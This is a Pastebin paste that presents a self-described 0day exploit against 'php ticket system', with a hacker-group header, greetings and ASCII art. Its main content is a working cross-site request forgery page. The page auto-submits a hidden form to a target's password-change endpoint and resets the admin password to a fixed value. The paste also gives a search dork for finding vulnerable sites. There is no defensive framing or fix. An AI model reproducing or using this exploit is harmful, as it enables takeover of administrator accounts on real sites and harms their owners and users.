Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################################
- [+] Exploit Title : php ticket system csrf
- [+] Author : Pablo '7days' Riberio
- [+] Team: So Good Security
- [+] Other 0days : http://pastebin.com/u/7days
- [+] Version : <= BETA 1
- [+] Tested on : windows/internet explorer
- [+] Details: Reset admin password via CSRF
- [+] Vendor: http://sourceforge.net/projects/phpticketsystem/
- [+] Duck : inurl:ticket/?p=process_change_password&id=1
- #########################################################################
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
- my home boy linus, all the cockneys and my grandma <3
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- no thnx 2: microsoft, windoz, estate agents and recruiters
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- `..`.:::.`
- .://o:::///:.
- `::+y+::::::/+/`
- :/++/::/:/--:+o:`
- `://:-:/-/:.-:/oo.
- `/-.-:::/o---::+o.
- ....-:/+hs::--:+o
- .``-//ohh+----:+.
- `.``-/+syhs:----/+`
- .-.`.-:+syyo:--.-:+/
- `---.`.-/+yo/:-----:+o.
- .::-...-:+/o/-.-----:+so`
- .-::-...-:::::-----:://osy:
- .::-....--:::----::/+ooosys-
- `:--.....-:/:::::/+osyyyyo:`
- ` `----...--:/++++oosyyhhy+-`
- :::::-------:::---..--:/+oossyyhhhhs/.
- ::::::-------:--.-.--:+osyyyhhhhho-`
- ------------.....--:/+oyyhhhhhy+.
- -----------...---:/+osyhhhhyo:`
- :::::-------:::/+osyyhhhhs/.
- ++++++++++++oossyyhhhhs/.
- sssssssyyyyhhhhhhhyo:.`
- ``..---..`
- portuguese cyber army
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- [+] Begin 0day
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- <html>
- <head>
- </head>
- <body>
- <!-- php ticket -->
- <form action="http://www.victim.com/ticket/?p=process_change_password&id=1" method="POST" id="csrf" name="csrf" onload="go()">
- <input type="hidden" name="new_password" value="12351235" />
- <input type="hidden" name="confirm_password" value="12351235" />
- <input type="hidden" name="submit" value="Change Password" />
- <input type="submit" value="Submit form" />
- </form>
- </form>
- <script language="JavaScript" type="text/javascript">
- document.csrf.submit();
- </script>
- </body>
- </html>
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- [+] End 0day
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement